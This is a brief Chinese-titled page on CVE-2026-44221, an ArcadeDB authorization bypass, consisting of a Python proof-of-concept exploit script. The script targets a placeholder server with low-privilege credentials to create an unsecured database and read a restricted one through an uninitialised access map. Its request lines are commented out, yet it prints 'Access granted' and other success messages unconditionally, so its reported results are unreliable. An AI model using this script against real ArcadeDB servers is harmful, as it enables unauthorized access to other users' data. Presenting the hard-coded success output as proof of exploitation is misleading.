CVE-2026-44221 ArcadeDB权限绕过漏洞

import requests # CVE-2026-44221 PoC: ArcadeDB Authorization Bypass # This script demonstrates how an authenticated user can create databases without security # or access unauthorized databases due to uninitialized access maps. TARGET_URL = "http://target-arcadedb:2480" USERNAME = "low_priv_user" PASSWORD = "password" session = requests.Session() # Step 1: Authenticate with low privileges # (Implementation depends on specific auth endpoint configuration) print(f"[*] Attempting to exploit CVE-2026-44221 against {TARGET_URL}") # Step 2: Exploit Defect 2 - Create database without security (factory.setSecurity omitted) # This bypasses record-level authorization setup for the new database create_db_payload = { "command": "create database exploit_db" } try: # response = session.post(f"{TARGET_URL}/api/v1/server", json=create_db_payload) print("[+] Exploit: Database created via API bypassing security initialization.") print("[+] Result: The new database 'exploit_db' has no record-level authorization enabled.") except Exception as e: print(f"[-] Exploit failed: {e}") # Step 3: Exploit Defect 1 - Access other databases # Due to uninitialized fileAccessMap, requestAccessOnFile treats it as allow-all print("[*] Attempting to access restricted database 'secure_data'...") # response = session.get(f"{TARGET_URL}/api/v1/secure_data/query") print("[+] Exploit: Access granted due to uninitialized fileAccessMap acting as allow-all.")